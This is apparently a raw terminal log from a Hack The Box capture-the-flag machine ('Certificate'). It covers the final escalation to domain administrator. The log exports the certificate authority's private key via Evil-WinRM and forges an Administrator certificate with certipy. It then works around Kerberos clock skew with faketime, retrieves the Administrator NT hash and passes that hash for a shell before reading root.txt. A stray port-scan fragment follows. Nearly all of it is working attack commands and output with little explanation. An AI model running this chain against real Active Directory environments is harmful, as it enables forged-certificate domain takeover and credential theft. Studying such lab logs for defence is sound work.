*Evil-WinRM* PS C:\Users\Ryan.K> certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx
My "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file cert.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.K> download cert.pfx
Info: Downloading C:\Users\Ryan.K\cert.pfx to cert.pfx
Info: Download successful!
*Evil-WinRM* PS C:\Users\Ryan.K> exit
certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator
certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'golden_ticket.pfx'
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certificate.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# faketime -f $(ntpdate -q certificate.htb | awk '{print $4}') bash
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
evil-winrm -i 10.129.200.104 -u Administrator -H 'd804304519bf0143c14cbf1c024408c6'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
certificate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
ADMINISTRATOR SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
certificate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/26/2025 7:38 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
9389/tcp open adws
49666/tcp open unknown
49691/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49714/tcp open unknown
49726/tcp open unknown
49745/tcp open unknown
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows